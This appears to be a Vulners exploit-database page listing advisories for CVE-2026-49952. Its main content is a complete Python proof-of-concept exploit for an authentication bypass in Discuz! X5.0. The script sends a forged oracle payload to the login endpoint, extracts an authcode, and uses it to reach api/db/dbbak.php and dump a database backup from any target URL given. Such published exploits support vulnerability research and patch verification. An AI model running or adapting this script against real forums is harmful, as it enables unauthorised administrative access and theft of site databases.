| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Exploit for CVE-2026-49952 | 17 Jun 202609:04 | – | githubexploit | |
| CVE-2026-49952 | 15 Jun 202620:20 | – | circl | |
| CVE-2026-49952 | 15 Jun 202618:43 | – | cve | |
| CVE-2026-49952 Discuz! X5.0 Authentication Bypass via dbbak.php Encryption Oracle | 15 Jun 202618:43 | – | cvelist | |
| EUVD-2026-36792 | 15 Jun 202621:30 | – | euvd | |
| CVE-2026-49952 | 15 Jun 202620:16 | – | nvd | |
| 📄 Discuz! X5.0 Authentication Bypass | 7 Jul 202600:00 | – | packetstorm | |
| PT-2026-49307 | 15 Jun 202600:00 | – | ptsecurity | |
| CVE-2026-49952 Discuz! X5.0 Authentication Bypass via dbbak.php Encryption Oracle | 15 Jun 202618:43 | – | vulnrichment |
# Exploit Title: Discuz! X5.0 - Authentication Bypass
# CVE: CVE-2026-49952
# Date: 2026-06-26
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://www.discuz.vip
# Software Link: https://www.discuz.vip
# Affected: Discuz! X5.0 (20260320 - 20260501)
# Tested on: Discuz! X5.0
# Category: WebApps
# Platform: PHP
# Exploit Type: Authentication Bypass
# CVSS: 9.1
# Description: Discuz! X5.0 suffers from an authentication bypass vulnerability via dbbak.php using UC_KEY encryption oracle allowing token reuse.
# Fixed in: 20260510+
# Usage:
# python3 exploit.py <target>
#
# Examples:
# python3 exploit.py http://target.com
# python3 exploit.py https://target.com --proxy http://127.0.0.1:8080
#
# Options:
# --proxy HTTP proxy
#
# Notes:
# • Tune payload if needed (e.g. admin|1|0|0)
#
# How to Use
#
# Step 1:
# Run the script against the target
#
# Step 2:
# Check if dbbak.php access is granted
import requests
import re
import sys
import argparse
import urllib.parse
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def banner():
print(r"""
╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ███████╔╝
║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗
║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
╔═╗ Banyamer Security ╔═╗
""")
def get_authcode(target, payload, proxy):
url = f"{target}/member.php?mod=logging&action=login&lssubmit=yes"
data = {
"username": payload,
"password": "dummy123",
"loginsubmit": "yes"
}
proxies = {"http": proxy, "https": proxy} if proxy else None
try:
r = requests.post(url, data=data, proxies=proxies, verify=False, allow_redirects=False, timeout=15)
match = re.search(r'authcode=([a-zA-Z0-9]{20,})', r.text)
if match:
return match.group(1)
match = re.search(r'([a-zA-Z0-9]{32,60})', r.text)
if match:
return match.group(1)
return None
except:
return None
def exploit_dbbak(target, authcode, proxy):
url = f"{target}/api/db/dbbak.php?code={urllib.parse.quote(authcode)}&operation=backup&appid=1"
proxies = {"http": proxy, "https": proxy} if proxy else None
try:
r = requests.get(url, proxies=proxies, verify=False, timeout=15)
print(f"[+] dbbak.php status: {r.status_code}")
if r.status_code == 200:
print("[+] Success! Access to database backup granted.")
print(r.text[:400])
else:
print("[-] Failed or access denied.")
except:
print("[-] Request failed.")
def main():
banner()
parser = argparse.ArgumentParser(description="Discuz! X5.0 CVE-2026-49952 PoC")
parser.add_argument("target", help="Target URL")
parser.add_argument("--proxy", help="HTTP proxy", default=None)
parser.add_argument("--payload", help="Oracle payload", default="admin|1|0|0")
args = parser.parse_args()
target = args.target.rstrip("/")
print(f"[*] Target: {target}")
print(f"[*] Payload: {args.payload}")
authcode = get_authcode(target, args.payload, args.proxy)
if authcode:
print(f"[+] Authcode: {authcode}")
exploit_dbbak(target, authcode, args.proxy)
else:
print("[-] Failed to get authcode.")
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation